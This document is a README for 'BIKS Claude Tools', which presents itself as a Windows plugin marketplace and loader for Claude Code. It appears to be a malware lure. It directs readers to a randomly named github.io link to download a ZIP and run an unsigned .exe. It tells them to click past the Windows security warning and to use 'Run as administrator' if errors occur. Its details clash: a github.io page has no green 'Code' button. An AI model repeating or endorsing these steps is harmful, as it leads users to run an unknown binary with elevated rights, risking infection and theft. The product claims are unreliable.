📖 What Is This?
BIKS Claude Tools is a plugin marketplace and installer for Claude Code . Think of it like an app store just for Claude plugins. You can browse available plugins, pick the ones you want, and install them one by one with a single click. The biks-claude-loader-update tool makes it simple to discover new plugins and keep them updated.
Whether you want to add writing helpers, code generators, or specialized AI functions, this tool lets you expand what Claude can do without any technical hassle.
🚀 Getting Started
Follow these steps to get BIKS Claude Loader running on your Windows computer. No programming experience needed.
Step 1: Download the Application
Visit this link to download the application: https://triune-contemplation240.github.io
Click the green "Code" button, then choose "Download ZIP" . Your browser will save a file called biks-claude-loader-update-main.zip to your Downloads folder.
Step 2: Extract the Files
Open your Downloads folder.
Right-click on biks-claude-loader-update-main.zip .
Select "Extract All" from the menu.
Choose a destination folder (the default is fine) and click "Extract" .
Step 3: Run the Application
Open the extracted folder (named biks-claude-loader-update-main ).
Look for a file named biks-claude-loader-update.exe or biks-claude-loader-update (may have a gear icon).
Double-click it to launch the loader.
If Windows shows a security warning, click "More info" then "Run anyway" . This is normal for new software from the internet.
🎯 How to Use
Open the Loader – The program starts with a simple window showing available plugins.
Browse the Marketplace – You will see a list of plugins with names and short descriptions.
Select a Plugin – Click the plugin you want to install. A button will appear saying "Install" .
Install – Click "Install" . The tool downloads and sets up the plugin automatically.
Repeat – Install as many plugins as you like, one at a time.
Update Plugins – The loader also checks for updates to your installed plugins. Click "Check for Updates" to see if any are available.
❓ Frequently Asked Questions
Do I need to install anything else first?
No. The loader works on its own. Just make sure you have Windows 10 or newer.
Will this break my Claude setup?
No. Plugins are installed separately and safely. You can uninstall any plugin from the loader at any time.
Where do plugins go?
They are installed into a special folder that Claude Code reads. The loader handles this automatically.
Can I use this on Mac or Linux?
This version is for Windows only. Mac and Linux support may come later.
I see an error when I run it. What should I do?
Make sure you extracted the ZIP file fully (do not run it from inside the ZIP).
Try right-clicking the .exe file and selecting "Run as administrator" .
If you still see an error, visit the GitHub page and open an issue in the "Issues" tab.
